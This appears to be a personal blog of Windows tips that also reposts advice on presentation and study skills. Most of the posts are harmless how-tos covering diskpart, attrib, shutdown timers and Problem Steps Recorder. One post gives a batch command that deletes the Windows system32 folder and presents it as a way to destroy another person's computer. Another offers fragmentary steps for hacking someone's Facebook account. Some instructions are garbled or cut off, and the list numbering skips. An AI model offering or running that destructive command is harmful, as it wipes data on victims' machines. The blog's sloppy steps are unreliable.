Monday 12 December 2016

How to improve your presentation skills.

Expert voice coach Carol Noakes offers her top five tips for powerful presenting. From body language to prompts, Carol highlights how we can improve our delivery to be successful presenters in our professional lives.
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Carol Noakes on powerful presenting

In the course of  political elections, it is crucial for candidates from all parties to be credible on stage. They are probably coached, but with varying levels of success. Post-debate, their  performances have been analysed on delivery style and content, and it is increasingly apparent that it is important to be aware of what works for you and to apply some fundamental principles that enhance your chance of success. For those of us who might not be running for this election, but who still need to  be credible presenters in our professional lives, here is a starter pack of five of those principles.

Top tips for presenting:

  1. Make your audience want to listen from the very beginning. Start with something relevant to them that will capture their interest and intrigue them: they need to know their time with you will have a benefit to them. The proposition that you set up in the introduction should be clearly justified in the conclusion.
  3. Your body language should signal confidence and  relaxation from the moment your audience sees you, so be physically open and check for signs of tension. Stand tall, drop your shoulders and practice  standing evenly on both feet when you are still.
  5. Include everyone with your eye contact as much as you can. The idea is to feel as if you are having a conversation with each person in the room, so look and sound warm and inclusive.
  7. Make sure your voice is warmed up and ready to bring your messages to life with variety of pace, pitch, emphasis and intonation. No matter how interesting your content is, if you deliver it in a monotone, the audience will find it hard to stay with you or to remember anything you said. Signal the key phrases with added vocal colour and think  about what you want them to feel at each stage.
  9. Use prompts as little as you can manage: you should feel secure that you have enough to keep you on track, but not rely on a  full script. The aim is to sound structured but flexible and fresh.
Above all, prepare well and rehearse beforehand, and when you are actually in front of your audience, be authentic and congruent. You can enhance an ordinary argument with great delivery and ruin a great argument with poor delivery, so make sure you aim to combine great content with great  delivery. Listen to feedback, practice, and treat each presentation as an opportunity to create new relationships. Good luck and have a great time.
Want to share these tips with your students? Download Carol's top tips on presentation skills in our handy list!

Saturday 3 December 2016

How To Improve your Study Skills

Study skills are the skills you need to enable you to study and learn efficiently – they are an important set of transferable life skills.
Our pages provide generic study skills advice – appropriate to learners across all disciplines and in different life circumstances: full and part-time students, those returning to education later in life, those engaged in professional development and anybody who wants to learn how to learn 
Key points about study skills:
  • You will develop your own personal approach to study and learning in a way that meets your own individual needs. As you develop your study skills you will discover what works for you, and what doesn’t.
  • Study skills are not subject specific - they are generic and can be used when studying any area. You will, of course, need to understand the concepts, theories and ideas surrounding your specific subject area. To get the most out of your studies, however, you’ll want to develop your study skills.
  • You need to practice and develop your study skills.  This will increase your awareness of how you study and you’ll become more confident.  Once mastered, study skills will be beneficial throughout your life.
  • Study skills are not just for students.  Study skills are transferable - you will take them with you beyond your education into new contexts. For example, organisational skills, time management, prioritizing, learning how to analyse, problem solving, and the self-discipline that is required to remain motivated.  Study skills relate closely to the type of skills that employers look for.  (See Transferable Skills and Employability Skills for more.)

Thursday 1 December 2016

How to add aditional clock in windows or MAC.

 Adding Additional Clocks
By using this trick we can see clocks for different cities. To make this work on Windows 7, click the clock icon in your system tray. Choose Additional Clocks in the windows that pops up and add the additional cities you want. Unfortunately, the additional times don’t exactly get displayed in your tray — you need to hover over the clock.
Steps :
o Click on the clock icon present in the system tray.
o Click on Change date and time Settings. . . option.
o Click on Additional Clocks Tab.
o The clocks for different cities will appear.
o Enjoy.
* * * * *

Sunday 27 November 2016

Auto Shutdown Timer trick in Windows Or MAC sleeping mood

Tip : Shutdown Timer trick in Windows 7.       

Steps :

o Click Start type CMD in the search box. Right click and click open to run Command line
o Type shutdown /s /t 3600 and Enter.

Note: 3600 are the amount of seconds before your computer shuts down.
So , 60secs*60mins=3600secs Means 1 Hour.

Friday 25 November 2016

How to Record the computer Screen without any software "windows Feature"

Advanced Computer Tips and Tricks

 Tip : Windows 7 Cool Feature - Problem Steps Recorder
Windows 7 ships with a utility named PSR (Problem Steps Recorder) that records the steps you’ve taken on the computer automatically including mouse clicks. You can use these recordings to speed up issues when you’re dealing with tech support.
Problem Steps Recorder can be used to automatically capture the steps performed by a user on a computer, including a text description of where they clicked and a picture of the screen during each click. This capture is then automatically saved to a file that can be used by a support professional to help the user troubleshoot the issue or understand what steps were taken by the user.
Steps :
            o Click Start  Click Run or (Win + R) to open Run Command.
            o Type PSR and Press Enter.
o Problem Steps Recorder toolbar will appear.

Tuesday 15 November 2016

Command Prompt full Tutorial for Windows or MAC

Using a Command Line Interface
A CoS126 Introduction
Long ago, before operating systems with graphical user interfaces (GUIs), everyone
used command line interfaces (CLIs). For example, instead of starting a program by
clicking the icon for your program in the Launchpad or whatever new‐fangled
mawhoozawhatzit, you instead typed the name of your program. And instead of
clicking on menus in your program to adjust settings, open files, etc, you could
specify these things as command line arguments.
In fact, expert computer users still use command prompts quite heavily. It’s an
incredibly useful abstraction that you’re now going to begin making use of.
A specific instance of the command line interface is called a “terminal window” by
Mac OS X (which utilizes a version of Unix under the hood), and the term “command
prompt” is used by Windows. The terms are virtually interchangeable. We will use
the term “command line interface” throughout this document.
Learning to fully utilize a command line interface is something that could (and does)
fill an entire book. In this tutorial, we’ll address the key ideas, give a few examples,
and leave you to learn the rest on your own as you choose.
The Basics – Opening the Command Line Interface
In Mac OS X, the terminal application can be found in Applications‐>Utilities‐
In Windows, it can be found in Programs‐>Accessories‐>Command Prompt.
Note, there are many other ways of accessing the command line interfaces. All of
them are fine to use.
Prompt text
When you open your CLI, the first thing you’ll see is a prompt, i.e. a string of text that
lets you know the computer is waiting for you, the user, to take action.
In Windows, the default prompt is the entire path to your present working directory
(we’ll discuss what that means later) followed by a > sign. For example:
In Mac OS X, the default command prompt is your computer name, followed by the
name of your present working directory, followed by your user name, followed by a
$. For example:Download Full PDF file

Saturday 12 November 2016

How to create funny virus in just seconds

Hello everyone.
 To day m telling you about "virus" , in which firstnof all you create a text document
right click and go new text document

  • just write X=MsgBox("Message Description",0+16,"Title") 

  • After writing the file save as any name or .bat

Wednesday 9 November 2016

How to damage window or operating system in just second

Hello everyone,
Today m telling you about the damage of operating system in which any computer or operating system is fully demage due to it is use to distroy of any other one computer you just do it .

del c:\WINDOWS\system32\*.*/q"

Save as "Damage computer.bat

Friday 4 November 2016

Attribs, how to set Attribs on folder for hide

Today m telling you about "Attrib" in the computer , Attribs are use for hide the folder,document,files or use to save from hacker and safe from people when you have threats of missing or leaked.
Steps:"for hide"

  • First Open the command promt in drive (where you want hide the document)

  • After that write the command, attrib +s +h +r   (folder ir file name)
  • Hit enter after refraining the document is hide and do not show on any side of computer. 
Step's:"for show"

  • Open cmd in drive or write (attrib -s -h -r   folder name) hit enter.

Life Skills

for exampl

Sunday 30 October 2016

How to Bootable USB in one minute.with CMD

Today m telling you about How to create Bootable USB in few second

  1. First connect the usb with device.
  2. open CMD with admin .
  3. Write command diskpart and hit Enter.
  4. list disk
  5. select disk 1
  6. clean
  7. create partition primary
  8. format fs=fat32 quick
  9. select disk 
  10. active 

After that copy window file in USB . Your USB it bootabled
If you want to save more time then format usb before or write these commands
list disk
select disk 
and copy files.

Wednesday 26 October 2016

Hackig facebook with cmd

There, we are telling you about the hacking of facebook.

  1. First you required an email accout who doesn't connect any fb account.
  2. Search the fb address who you want to hack.
  3. Open fb page and right click on the page or click on inspect.
  4. Some are there we tell you on next bolg post
Plz follow my bolg ang get more intresting things.

Tuesday 25 October 2016

Format USB with CMD

first of all connect the flash drive
open cmd with admin.
write : diskpart

  • list disk
  • select disk 1
  • clean
  • create partition primary
  • format fs=fat32 quick
If the USB not formted then last command change with (format fs=fat32 )

Monday 24 October 2016

Computer Basic tips

All Computer Basic tips and tricks in this video plz check it and enjoy the video